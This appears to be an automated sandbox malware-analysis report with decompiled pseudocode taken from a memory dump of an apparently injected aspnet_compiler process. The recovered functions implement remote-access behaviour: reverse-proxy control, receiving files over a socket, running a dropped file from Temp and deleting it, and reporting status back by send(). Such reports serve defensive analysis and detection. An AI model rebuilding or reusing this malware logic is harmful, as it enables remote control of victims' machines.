                    0x00443b4e
                    0x00443b50
                    0x00443b50
                    0x00000000
                    0x00443ada
                    0x00443ada
                    0x00443adc
                    0x00443aec
                    0x00443aec
                    0x00000000

                    APIs
                      • Part of subcall function 00446A95: GetLastError.KERNEL32(00000020,?,004390F5,?,?,?,0043E278,?,?,00000020,00000000,?,?,?,0042C60C,0000003B), ref: 00446A99
                      • Part of subcall function 00446A95: _free.LIBCMT ref: 00446ACC
                      • Part of subcall function 00446A95: SetLastError.KERNEL32(00000000,0043E278,?,?,00000020,00000000,?,?,?,0042C60C,0000003B,?,00000041,00000000,00000000), ref: 00446B0D
                      • Part of subcall function 00446A95: _abort.LIBCMT ref: 00446B13
                    • _memcmp.LIBVCRUNTIME ref: 00443D24
                    • _free.LIBCMT ref: 00443D95
                    • _free.LIBCMT ref: 00443DAE
                    • _free.LIBCMT ref: 00443DE0
                    • _free.LIBCMT ref: 00443DE9
                    • _free.LIBCMT ref: 00443DF5
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: _free$ErrorLast$_abort_memcmp
                    • String ID: C
                    • API String ID: 1679612858-1037565863
                    • Opcode ID: 1b1c48012eeba7c920ea9576d40ce91f528395a5288f823ec30480752eb40b77
                    • Instruction ID: 0980accce80153226f5651e8385caabd2fc42b640f1cc77c082d88c635091a5b
                    • Opcode Fuzzy Hash: 1b1c48012eeba7c920ea9576d40ce91f528395a5288f823ec30480752eb40b77
                    • Instruction Fuzzy Hash: 71B16B75A016199FEB24DF18C884BAEB7B4FF08705F5085AEE849A7351E734AE90CF44
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00413C51 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 225COMMON
                    Download Yara Rule
                    C-Code - Quality: 45%
                    			E00413C51(signed int _a4, signed int _a8, signed int _a12, signed int _a16) {
				intOrPtr _v0;
				char _v4;
				signed int _v8;
				signed short _v12;
				signed int _v16;
				signed int _v20;
				signed short _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v48;
				signed int _t70;
				signed short _t81;
				signed int _t82;
				signed short _t85;
				signed short _t86;
				void* _t88;
				signed int _t97;
				signed char _t99;
				void* _t100;
				signed int _t107;
				signed short _t108;
				signed int _t110;
				signed int _t116;
				signed int* _t118;
				signed int _t119;
				signed int _t120;
				intOrPtr _t121;

				_t110 = _a8;
				_t99 = 0;
				_t120 = _a4;
				_t97 = 0;
				_v28 = 0;
				_v16 = 0;
				_v32 = 0;
				_v4 = 0;
				_v12 = 0;
				_v24 = 0;
				_v8 = 0;
				_v20 = 0;
				_t119 = 0;
				_t118 = _a16;
				 *_t118 = 0;
				if(_t120 != 0 || _t110 != 0) {
					_t70 = _a12;
					__eflags = _t70;
					if(_t70 == 0) {
						L20:
						_a16 = _t97;
						__eflags = _t110;
						if(_t110 == 0) {
							L40:
							__eflags = _t120;
							if(_t120 == 0) {
								__eflags = _v28 & 0x00000001;
								_t100 = 0;
								_t72 =  !=  ? _t100 : 0x7f000001;
								__imp__#8(0x7f000001);
								_t121 =  !=  ? _t100 : 0x7f000001;
								L47:
								_t73 = E004139B4(_t97, _v20, __eflags, _v36, _t121);
								 *_t118 = _t73;
								__eflags = _t73;
								if(_t73 != 0) {
									__eflags = _v0 - _t119;
									if(_v0 == _t119) {
										L54:
										__eflags = _v28;
										if(_v28 == 0) {
											L57:
											return _t119;
										}
										_t119 = E00413BD8(_v24,  *_t118);
										__eflags = _t119;
										if(_t119 == 0) {
											goto L57;
										}
										L56:
										E00413C16(_t73,  *_t118);
										 *_t118 =  *_t118 & 0x00000000;
										__eflags =  *_t118;
										goto L57;
									}
									 *_t73 =  *_t73 | 0x00000004;
									__eflags = _v32 & 0x00000002;
									if((_v32 & 0x00000002) == 0) {
										goto L54;
									}
									__imp__#12(_t121);
									 *((intOrPtr*)( *_t118 + 0x14)) = E00413936(_t73);
									_t73 =  *_t118;
									__eflags =  *((intOrPtr*)(_t73 + 0x14)) - _t119;
									if( *((intOrPtr*)(_t73 + 0x14)) != _t119) {
										goto L54;
									}
									_t119 = 8;
									L53:
									__eflags = _t119;
									if(_t119 != 0) {
										goto L56;
									}
									goto L54;
								}
								_t119 = 8;
								goto L56;
							}
							__eflags = E0041396E(_t120,  &_v4);
							if(__eflags != 0) {
								_t121 = _v4;
								goto L47;
							}
							_t73 = _v28;
							__eflags = _t73 & 0x00000004;
							if((_t73 & 0x00000004) == 0) {
								_push(_t118);
								_push(_t73 & 0x00000002);
								_push(_v32);
								_push(_v16);
								_t119 = E00413ACD(_t120, _t97);
								goto L53;
							}
							_t119 = 0x2af9;
							goto L56;
						}
						_t107 = E0043E19F(_t99, _t110,  &_v12, 0xa) & 0x0000ffff;
						_t81 = _v12;
						_v32 = _t107;
						__eflags =  *_t81;
						if( *_t81 != 0) {
							__eflags = _t97;
							if(_t97 == 0) {
								L26:
								__imp__#55(_a8, "udp");
								__eflags = _t81;
								if(_t81 != 0) {
									_t85 =  *(_t81 + 8) & 0x0000ffff;
									_v28 = _t85;
									_t81 = _t85 & 0x0000ffff;
									_v40 = _t81;
								}
								L28:
								__eflags = _t97;
								if(_t97 == 0) {
									L30:
									__imp__#55(_v0, "tcp");
									_t116 = 1;
									__eflags = _t81;
									if(_t81 == 0) {
										L32:
										_t108 = _v24;
										_t82 = _v48;
										L33:
										__eflags = _t82;
										if(_t82 != 0) {
											__eflags = _t97;
											if(_t97 != 0) {
												goto L40;
											}
											__eflags = _t108;
											_t97 = (_t97 & 0xffffff00 | _t108 == 0x00000000) + 1;
											__eflags = _t108;
											if(_t108 == 0) {
												L39:
												_t48 =  &_v40;
												 *_t48 = _v40 & _t119;
												__eflags =  *_t48;
												goto L40;
											}
											__eflags = _v36 - _t119;
											if(_v36 == _t119) {
												goto L39;
											}
											_v40 = _t116;
											goto L40;
										}
										__eflags = _t97;
										_t84 =  !=  ? 0x277d : 0x2af9;
										return  !=  ? 0x277d : 0x2af9;
									}
									_t108 =  *(_t81 + 8) & 0x0000ffff;
									_t82 = _t108 & 0x0000ffff;
									_v48 = _t82;
									goto L33;
								}
								_t116 = 1;
								__eflags = _t97 - 1;
								if(_t97 != 1) {
									goto L32;
								}
								goto L30;
							}
							__eflags = _t97 - 2;
							if(_t97 != 2) {
								goto L28;
							}
							goto L26;
						}
						__imp__#9(_t107);
						_t86 = _t81 & 0x0000ffff;
						__eflags = _t97;
						_v24 = _t86;
						_v36 = _t86 & 0x0000ffff;
						_t88 = 1;
						_t97 =  ==  ? _t88 : _t97;
						__eflags = _a12;
						_v28 = 0 | _a12 == 0x00000000;
						goto L40;
					}
					__eflags =  *((intOrPtr*)(_t70 + 0x10)) - _t99;
					if( *((intOrPtr*)(_t70 + 0x10)) != _t99) {
						L23:
						return 0x2afb;
					}
					__eflags =  *((intOrPtr*)(_t70 + 0x14)) - _t99;
					if( *((intOrPtr*)(_t70 + 0x14)) != _t99) {
						goto L23;
					}
					__eflags =  *((intOrPtr*)(_t70 + 0x18)) - _t99;
					if( *((intOrPtr*)(_t70 + 0x18)) != _t99) {
						goto L23;
					}
					__eflags =  *((intOrPtr*)(_t70 + 0x1c)) - _t99;
					if( *((intOrPtr*)(_t70 + 0x1c)) != _t99) {
						goto L23;
					}
					_t99 =  *_t70;
					_v28 = _t99;
					__eflags = _t99 & 0x00000002;
					if((_t99 & 0x00000002) == 0) {
						L11:
						__eflags =  *((intOrPtr*)(_t70 + 4)) - _t97;
						if( *((intOrPtr*)(_t70 + 4)) == _t97) {
							L14:
							_t97 =  *(_t70 + 8);
							__eflags = _t97;
							if(_t97 == 0) {
								L19:
								_v16 =  *((intOrPtr*)(_t70 + 0xc));
								goto L20;
							}
							__eflags = _t97 - 1;
							if(_t97 == 1) {
								goto L19;
							}
							__eflags = _t97 - 2;
							if(_t97 == 2) {
								goto L19;
							}
							__eflags = _t97 - 3;
							if(_t97 == 3) {
								goto L19;
							}
							return 0x273c;
						}
						__eflags =  *((intOrPtr*)(_t70 + 4)) - 2;
						if( *((intOrPtr*)(_t70 + 4)) == 2) {
							goto L14;
						}
						return 0x273f;
					}
					__eflags = _t120;
					if(_t120 != 0) {
						goto L11;
					}
					return 0x2726;
				} else {
					return 0x2af9;
				}
			}
































                    0x00413c54
                    0x00413c58
                    0x00413c5c
                    0x00413c60
                    0x00413c62
                    0x00413c66
                    0x00413c6a
                    0x00413c6e
                    0x00413c72
                    0x00413c76
                    0x00413c7a
                    0x00413c7e
                    0x00413c83
                    0x00413c86
                    0x00413c8a
                    0x00413c8e
                    0x00413c9e
                    0x00413ca2
                    0x00413ca4
                    0x00413d1f
                    0x00413d1f
                    0x00413d23
                    0x00413d25
                    0x00413e1f
                    0x00413e1f
                    0x00413e21
                    0x00413e64
                    0x00413e70
                    0x00413e71
                    0x00413e75
                    0x00413e7b
                    0x00413e7d
                    0x00413e88
                    0x00413e8d
                    0x00413e8f
                    0x00413e91
                    0x00413e98
                    0x00413e9c
                    0x00413ec9
                    0x00413ec9
                    0x00413ece
                    0x00413eeb
                    0x00000000
                    0x00413eeb
                    0x00413edb
                    0x00413edd
                    0x00413edf
                    0x00000000
                    0x00000000
                    0x00413ee1
                    0x00413ee3
                    0x00413ee8
                    0x00413ee8
                    0x00000000
                    0x00413ee8
                    0x00413e9e
                    0x00413ea1
                    0x00413ea6
                    0x00000000
                    0x00000000
                    0x00413ea9
                    0x00413eb8
                    0x00413ebb
                    0x00413ebd
                    0x00413ec0
                    0x00000000
                    0x00000000
                    0x00413ec4
                    0x00413ec5
                    0x00413ec5
                    0x00413ec7
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00413ec7
                    0x00413e95
                    0x00000000
                    0x00413e95
                    0x00413e2e
                    0x00413e30
                    0x00413e5e
                    0x00000000
                    0x00413e5e
                    0x00413e32
                    0x00413e36
                    0x00413e38
                    0x00413e44
                    0x00413e4a
                    0x00413e4b
                    0x00413e51
                    0x00413e5a
                    0x00000000
                    0x00413e5a
                    0x00413e3a
                    0x00000000
                    0x00413e3a
                    0x00413d38
                    0x00413d3e
                    0x00413d42
                    0x00413d46
                    0x00413d49
                    0x00413d84
                    0x00413d86
                    0x00413d8d
                    0x00413d96
                    0x00413d9c
                    0x00413d9e
                    0x00413da0
                    0x00413da4
                    0x00413da8
                    0x00413dab
                    0x00413dab
                    0x00413daf
                    0x00413daf
                    0x00413db1
                    0x00413dba
                    0x00413dc3
                    0x00413dcb
                    0x00413dcc
                    0x00413dce
                    0x00413ddd
                    0x00413ddd
                    0x00413de1
                    0x00413de5
                    0x00413de5
                    0x00413de8
                    0x00413dfe
                    0x00413e00
                    0x00000000
                    0x00000000
                    0x00413e02
                    0x00413e08
                    0x00413e09
                    0x00413e0c
                    0x00413e1b
                    0x00413e1b
                    0x00413e1b
                    0x00413e1b
                    0x00000000
                    0x00413e1b
                    0x00413e0e
                    0x00413e13
                    0x00000000
                    0x00000000
                    0x00413e15
                    0x00000000
                    0x00413e15
                    0x00413dea
                    0x00413df6
                    0x00000000
                    0x00413df6
                    0x00413dd0
                    0x00413dd4
                    0x00413dd7
                    0x00000000
                    0x00413dd7
                    0x00413db5
                    0x00413db6
                    0x00413db8
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00413db8
                    0x00413d88
                    0x00413d8b
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00413d8b
                    0x00413d4c
                    0x00413d52
                    0x00413d55
                    0x00413d57
                    0x00413d5e
                    0x00413d64
                    0x00413d65
                    0x00413d6a
                    0x00413d71
                    0x00000000
                    0x00413d71
                    0x00413ca6
                    0x00413ca9
                    0x00413d7a
                    0x00000000
                    0x00413d7a
                    0x00413caf
                    0x00413cb2
                    0x00000000
                    0x00000000
                    0x00413cb8
                    0x00413cbb
                    0x00000000
                    0x00000000
                    0x00413cc1
                    0x00413cc4
                    0x00000000
                    0x00000000
                    0x00413cca
                    0x00413ccc
                    0x00413cd0
                    0x00413cd3
                    0x00413ce3
                    0x00413ce3
                    0x00413ce6
                    0x00413cf8
                    0x00413cf8
                    0x00413cfb
                    0x00413cfd
                    0x00413d18
                    0x00413d1b
                    0x00000000
                    0x00413d1b
                    0x00413cff
                    0x00413d02
                    0x00000000
                    0x00000000
                    0x00413d04
                    0x00413d07
                    0x00000000
                    0x00000000
                    0x00413d09
                    0x00413d0c
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00413d0e
                    0x00413ce8
                    0x00413cec
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00413cee
                    0x00413cd5
                    0x00413cd7
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00413c94
                    0x00000000
                    0x00413c94

                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: tcp$udp
                    • API String ID: 0-3725065008
                    • Opcode ID: 989d942223f8045c26bfd392dcc121cd2c507f3a9003dba06f7d9cf9a685d5a6
                    • Instruction ID: 254d435c4adeb88c6bd87cc200726294b993cf902dfc57313b1be41f1fc3726a
                    • Opcode Fuzzy Hash: 989d942223f8045c26bfd392dcc121cd2c507f3a9003dba06f7d9cf9a685d5a6
                    • Instruction Fuzzy Hash: A77188706083028FDB24CE15D4846ABBBE4EF94746F14493FF88597360E779CE858B9A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00410A38 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 191COMMON
                    Download Yara Rule
                    C-Code - Quality: 67%
                    			E00410A38(void* __edx, void* __eflags, intOrPtr _a4) {
				char _v32;
				char _v56;
				void* _v60;
				char _v72;
				char _v76;
				char _v80;
				char _v88;
				char _v92;
				void* _v96;
				char _v108;
				char _v112;
				void* __ebx;
				void* __edi;
				void* __ebp;
				intOrPtr* _t26;
				char* _t34;
				char* _t37;
				intOrPtr _t50;
				char* _t51;
				char* _t58;
				intOrPtr _t60;
				intOrPtr _t61;
				char* _t65;
				void* _t68;
				intOrPtr _t121;
				void* _t125;
				void* _t128;
				void* _t130;
				void* _t131;
				void* _t133;
				void* _t135;
				signed int _t136;
				void* _t139;
				void* _t140;
				void* _t141;
				void* _t145;

				_t147 = __eflags;
				_t111 = __edx;
				_push(_t68);
				_t121 = _a4;
				E004020D6(_t68,  &_v76, __edx, __eflags, _t121 + 0xc);
				SetEvent( *(_t121 + 0x24));
				_t26 = E00401F8B( &_v80);
				E00404182( &_v80,  &_v56, 4, 0xffffffff);
				_t139 = (_t136 & 0xfffffff8) - 0x3c;
				E004020D6(0x472ec8, _t139, _t111, _t147, 0x472ec8);
				_t140 = _t139 - 0x18;
				E004020D6(0x472ec8, _t140, _t111, _t147,  &_v72);
				E0041A976( &_v112, _t111);
				_t141 = _t140 + 0x30;
				_t125 =  *_t26 - 0x46;
				if(_t125 == 0) {
					E00401E45( &_v88, _t111, _t135, __eflags, 1);
					_t34 = E0040245C();
					E00401F8B(E00401E45( &_v92, _t111, _t135, __eflags, 1));
					_t112 = _t34;
					_t37 = E00411235();
					_t127 = _t37;
					__eflags = _t37;
					if(__eflags == 0) {
						_t128 = _t141 - 0x18;
						_push("1");
						L19:
						_t111 = E00402F11( &_v32, E00401E45( &_v88, _t112, _t135, __eflags, 0), _t135, 0x472ec8);
						E00408832(0x472ec8, _t128, _t39, _t121, _t135, __eflags);
						_push(0x85);
						E00404A81(_t121, _t39, __eflags);
						E00401FB8();
						L20:
						E00401E6D( &_v108, _t111);
						E00401FB8();
						E00401FB8();
						return 0;
					}
					 *0x470d50 = E004114AA(_t127, "StartForward");
					 *0x470d4c = E004114AA(_t127, "StartReverse");
					 *0x470d54 = E004114AA(_t127, "StopForward");
					_t50 = E004114AA(_t127, "StopReverse");
					_t112 = "GetDirectListeningPort";
					 *0x470d5c = _t50;
					_t51 = E004114AA(_t127, "GetDirectListeningPort");
					__eflags =  *0x470d50;
					 *0x470d58 = _t51;
					if(__eflags == 0) {
						L17:
						_t128 = _t141 - 0x18;
						_push("2");
						goto L19;
					}
					__eflags =  *0x470d4c;
					if(__eflags == 0) {
						goto L17;
					}
					__eflags =  *0x470d54;
					if(__eflags == 0) {
						goto L17;
					}
					__eflags = _t51;
					if(__eflags == 0) {
						goto L17;
					}
					 *0x470d49 = 1;
					E004020D6(0x472ec8, _t141 - 0x18, "GetDirectListeningPort", __eflags, E00401E45( &_v88, "GetDirectListeningPort", _t135, __eflags, 0));
					_push(0x76);
					L10:
					E00404A81(_t121, _t112, __eflags);
					goto L20;
				}
				_t130 = _t125 - 1;
				if(_t130 == 0) {
					_t58 =  *0x470d50(E0043A3AC(_t55, E00401F8B(E00401E45( &_v88, _t111, _t135, __eflags, 0))));
					_t145 = _t141 - 0x14;
					L9:
					_t112 = _t58;
					E0041A6E9(0x472ec8, _t145, _t58);
					_push(0x77);
					goto L10;
				}
				_t131 = _t130 - 1;
				if(_t131 == 0) {
					_t60 =  *0x470adc; // 0xedf140
					_t61 =  *((intOrPtr*)(_t60 + 0x18));
					__imp__#12( *((intOrPtr*)(_t61 + 4)));
					_t65 =  *0x470d4c(_t61, E0043A3AC(_t62, E00401F8B(E00401E45( &_v92, _t111, _t135, __eflags, 0))) & 0x0000ffff);
					__eflags = _t65;
					_t109 =  !=  ? 1 :  *0x470d4a & 0x000000ff;
					 *0x470d4a =  !=  ? 1 :  *0x470d4a & 0x000000ff;
					_t112 = _t65;
					E0041A6E9(0x472ec8, _t141 - 0x10, _t65);
					_push(0x78);
					goto L10;
				}
				_t133 = _t131 - 1;
				if(_t133 == 0) {
					_t58 =  *0x470d54();
					_t145 = _t141 - 0x18;
					goto L9;
				}
				if(_t133 == 1) {
					 *0x470d5c();
					 *0x470d4a = 0;
				}
				goto L20;
			}







































                    0x00410a38
                    0x00410a38
                    0x00410a45
                    0x00410a48
                    0x00410a4f
                    0x00410a57
                    0x00410a61
                    0x00410a75
                    0x00410a7a
                    0x00410a85
                    0x00410a8a
                    0x00410a94
                    0x00410a9d
                    0x00410aa2
                    0x00410aa5
                    0x00410aa8
                    0x00410b83
                    0x00410b8a
                    0x00410b9e
                    0x00410ba3
                    0x00410ba7
                    0x00410bac
                    0x00410bae
                    0x00410bb0
                    0x00410c5d
                    0x00410c5f
                    0x00410c64
                    0x00410c7c
                    0x00410c80
                    0x00410c86
                    0x00410c8d
                    0x00410c96
                    0x00410c9b
                    0x00410c9f
                    0x00410ca8
                    0x00410cb1
                    0x00410cbe
                    0x00410cbe
                    0x00410bc7
                    0x00410bd8
                    0x00410be9
                    0x00410bf0
                    0x00410bf5
                    0x00410bfa
                    0x00410c01
                    0x00410c06
                    0x00410c0d
                    0x00410c12
                    0x00410c4e
                    0x00410c51
                    0x00410c53
                    0x00000000
                    0x00410c53
                    0x00410c14
                    0x00410c1b
                    0x00000000
                    0x00000000
                    0x00410c1d
                    0x00410c24
                    0x00000000
                    0x00000000
                    0x00410c26
                    0x00410c28
                    0x00000000
                    0x00000000
                    0x00410c30
                    0x00410c42
                    0x00410c47
                    0x00410b71
                    0x00410b73
                    0x00000000
                    0x00410b73
                    0x00410aae
                    0x00410ab1
                    0x00410b5d
                    0x00410b63
                    0x00410b66
                    0x00410b66
                    0x00410b6a
                    0x00410b6f
                    0x00000000
                    0x00410b6f
                    0x00410ab7
                    0x00410aba
                    0x00410ae7
                    0x00410aec
                    0x00410af2
                    0x00410b18
                    0x00410b28
                    0x00410b2a
                    0x00410b30
                    0x00410b36
                    0x00410b3a
                    0x00410b3f
                    0x00000000
                    0x00410b3f
                    0x00410abc
                    0x00410abf
                    0x00410adc
                    0x00410ae2
                    0x00000000
                    0x00410ae2
                    0x00410ac4
                    0x00410aca
                    0x00410ad0
                    0x00410ad0
                    0x00000000

                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: Eventinet_ntoa
                    • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse
                    • API String ID: 3578746661-168337528
                    • Opcode ID: f8b804ea664db580410c84c6d40a1447952e14db6ab85270271298b77444c8bb
                    • Instruction ID: e75f285b9767d1c550f565d519be053d97adf82a0a3bf380a10654d69fa8857e
                    • Opcode Fuzzy Hash: f8b804ea664db580410c84c6d40a1447952e14db6ab85270271298b77444c8bb
                    • Instruction Fuzzy Hash: A051D631A043009BC714BB79D81A66E36A5AB80314F40453FF90AA76E5EF7C9985CBDF
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00416BCD Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 108filesynchronizationCOMMON
                    Download Yara Rule
                    C-Code - Quality: 73%
                    			E00416BCD(void* __edx, void* __eflags, char _a4, char _a28) {
				char _v28;
				struct _SHELLEXECUTEINFOA _v88;
				char _v112;
				char _v136;
				char _v316;
				void* __ebx;
				void* __esi;
				void* __ebp;
				void* _t33;
				void* _t41;
				intOrPtr _t50;
				signed int _t60;
				char* _t68;
				void* _t73;
				void* _t90;
				void* _t91;

				_t94 = __eflags;
				_t33 = E00402073(_t60,  &_v136, __edx, _t90, "\\");
				_t87 = E004052DD(_t60,  &_v112, E0043A9AA(_t60, __eflags, "Temp"), _t90, _t94, _t33);
				E00402EF0(_t60,  &_v28, _t35, _t90, _t94,  &_a4);
				E00401FB8();
				_t68 =  &_v136;
				E00401FB8();
				_push(_t68);
				_push(_t68);
				_t41 = E00416E0A(E0040F0F6( &_v316, _t35, _t94, E00401F8B( &_v28), 0x10),  &_v316);
				_t95 = _t41;
				if(_t41 == 0) {
					E00402073(_t60, _t91 - 0x18, _t87, _t90, 0x464074);
					_push(0x6f);
					_t73 = 0x473580;
					goto L6;
				} else {
					_t87 =  &_a28;
					E00416E1A( &_v316,  &_a28, _t95);
					E0040F0A7( &_v316,  &_a28, _t95);
					_v88.hwnd = _v88.hwnd & 0x00000000;
					_v88.lpVerb = _v88.lpVerb & 0x00000000;
					_v88.cbSize = 0x3c;
					_v88.fMask = 0x40;
					_t50 = E00401F8B( &_v28);
					asm("movaps xmm0, [0x46b1c0]");
					_v88.lpFile = _t50;
					asm("movups [ebp-0x40], xmm0");
					_t60 = _t60 & 0xffffff00 | ShellExecuteExA( &_v88) != 0x00000000;
					_t97 = _v88.hProcess;
					if(_v88.hProcess != 0) {
						E00402073(_t60, _t91,  &_a28, _t90, 0x464074);
						_push(0x70);
						E00404A81(0x473580, _t87, _t97);
						WaitForSingleObject(_v88.hProcess, 0xffffffff);
						CloseHandle(_v88.hProcess);
						DeleteFileA(E00401F8B( &_v28));
					}
					_t98 = _t60 - 1;
					if(_t60 == 1) {
						E00402073(_t60, _t91 - 0x18, _t87, _t90, 0x464074);
						_push(0x6e);
						_t73 = 0x473580;
						L6:
						E00404A81(_t73, _t87, _t98);
					}
				}
				E0040E8CD(_t60,  &_v316, 0x464074);
				E00401FB8();
				E00401FB8();
				return E00401FB8();
			}



















                    0x00416bcd
                    0x00416be8
                    0x00416c04
                    0x00416c09
                    0x00416c12
                    0x00416c17
                    0x00416c1d
                    0x00416c22
                    0x00416c23
                    0x00416c40
                    0x00416c45
                    0x00416c47
                    0x00416d08
                    0x00416d0d
                    0x00416d0f
                    0x00000000
                    0x00416c4d
                    0x00416c4d
                    0x00416c56
                    0x00416c61
                    0x00416c66
                    0x00416c6d
                    0x00416c71
                    0x00416c78
                    0x00416c7f
                    0x00416c84
                    0x00416c8b
                    0x00416c92
                    0x00416ca8
                    0x00416cab
                    0x00416caf
                    0x00416cb7
                    0x00416cbc
                    0x00416cc0
                    0x00416cca
                    0x00416cd3
                    0x00416ce2
                    0x00416ce2
                    0x00416ce8
                    0x00416ceb
                    0x00416cf3
                    0x00416cf8
                    0x00416cfa
                    0x00416d14
                    0x00416d14
                    0x00416d14
                    0x00416ceb
                    0x00416d1f
                    0x00416d27
                    0x00416d2f
                    0x00416d42

                    APIs
                      • Part of subcall function 00416E1A: __EH_prolog.LIBCMT ref: 00416E1F
                    • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00464074), ref: 00416CCA
                    • CloseHandle.KERNEL32(00000000), ref: 00416CD3
                    • DeleteFileA.KERNEL32(00000000), ref: 00416CE2
                    • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00416C96
                      • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.814452926.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_aspnet_compiler.jbxd
                    Yara matches
                    Similarity
                    • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                    • String ID: <$@$Temp
                    • API String ID: 1704390241-1032778388
                    • Opcode ID: ff9cea69b05bc38d64019fd9820552f1091102cc02052d8ee4391d685e661bf1
                    • Instruction ID: 69e270f03dbcf525bbd0e705c12af2ecc391514570d21efb9077f5f7aa5c102b
                    • Opcode Fuzzy Hash: ff9cea69b05bc38d64019fd9820552f1091102cc02052d8ee4391d685e661bf1
                    • Instruction Fuzzy Hash: A54196319002099BDB14FBA1DC56AED7738AF50318F50427EF505760D2EF785A86CB99
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00406FD7 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102fileCOMMON
                    Download Yara Rule
                    C-Code - Quality: 88%
                    			E00406FD7(intOrPtr __ecx, void* __eflags, intOrPtr _a8, char _a12, char _a16, void* _a36, char _a40, void _a52, char _a64, intOrPtr _a100052, intOrPtr _a100072, char _a100080) {
				long _v0;
				char _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				void* __ebp;
				WCHAR* _t35;
				long _t42;
				struct _OVERLAPPED* _t54;
				intOrPtr _t72;
				intOrPtr _t74;
				long _t76;
				void* _t77;
				void* _t78;
				void* _t80;
				void* _t82;
				void* _t83;
				void* _t85;

				_t82 = __eflags;
				E00455FB0();
				_push(_t77);
				_t74 = __ecx;
				_t69 =  &_a100080;
				asm("xorps xmm0, xmm0");
				_a8 = __ecx;
				_t54 = 0;
				asm("movlpd [esp+0x10], xmm0");
				_a12 = 0;
				E00403242(0,  &_a16, _t77, _t82, E004087F0( &_a40,  &_a100080, _t77, L".part"));
				E00401EE9();
				_t78 = CreateFileW(E00401EE4( &_a12), 4, 0, 0, 2, 0x80, 0);
				_t83 = _v0 - _a100072;
				if(_t83 > 0) {
					L6:
					CloseHandle(_t78);
					_t35 = E00401EE4( &_a100080);
					MoveFileW(E00401EE4( &_a16), _t35);
					_t54 = 1;
				} else {
					_t72 = _a100072;
					if(_t83 >= 0) {
						L5:
						if(_v0 < _t72) {
							goto L2;
						} else {
							goto L6;
						}
					} else {
						while(1) {
							L2:
							_t42 = E00404B76(_t74,  &_a64, 0x186a0);
							_t76 = _t42;
							asm("cdq");
							_v12 = _v12 + _t42;
							asm("adc [esp+0x18], edx");
							WriteFile(_t78,  &_a52, _t76,  &_v0, _t54);
							_t80 = _t80 - 0x18;
							E00402097(_t54, _t80, _t69, _t78, _t83,  &_v12, 8);
							E00404A81(_v12, _t69, _t83, 0x57, _v12);
							if(_t76 <= 0) {
								break;
							}
							_t74 = _v16;
							_t85 = _v20 - _a100052;
							if(_t85 < 0) {
								continue;
							} else {
								if(_t85 > 0) {
									goto L6;
								} else {
									goto L5;
								}
							}
							goto L7;
						}
						CloseHandle(_t78);
						DeleteFileW(E00401EE4( &_v8));
					}
				}
				L7:
				E00401EE9();
				E00401EE9();
				return _t54;
			}






















                    0x00406fd7
                    0x00406fdc
                    0x00406fe2
                    0x00406fe4
                    0x00406fe6
                    0x00406fee
                    0x00406ff1
                    0x00406ff5
                    0x00406ff7
                    0x00407006
                    0x00407015
                    0x0040701e
                    0x0040703f
                    0x00407048
                    0x0040704c
                    0x004070c0
                    0x004070c1
                    0x004070ce
                    0x004070de
                    0x004070e4
                    0x0040704e
                    0x0040704e
                    0x00407055
                    0x004070ba
                    0x004070be
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00407057
                    0x00407057
                    0x00407057
                    0x00407064
                    0x00407069
                    0x0040706b
                    0x0040706c
                    0x00407075
                    0x00407081
                    0x00407087
                    0x00407093
                    0x0040709e
                    0x004070a5
                    0x00000000
                    0x00000000
                    0x004070ae
                    0x004070b2
                    0x004070b6
                    0x00000000
                    0x004070b8
                    0x004070b8
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004070b8
                    0x00000000
                    0x004070b6
                    0x00407109
                    0x00407119
                    0x00407119
                    0x00407055
                    0x004070e6
                    0x004070ea
                    0x004070f6
                    0x00407107

                    APIs
                    • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,00472EC8,00463F74,?,00000000,00407670,00000000), ref: 00407039
                    • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,00407670,00000000,?,?,0000000A,00000000), ref: 00407081
                      • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
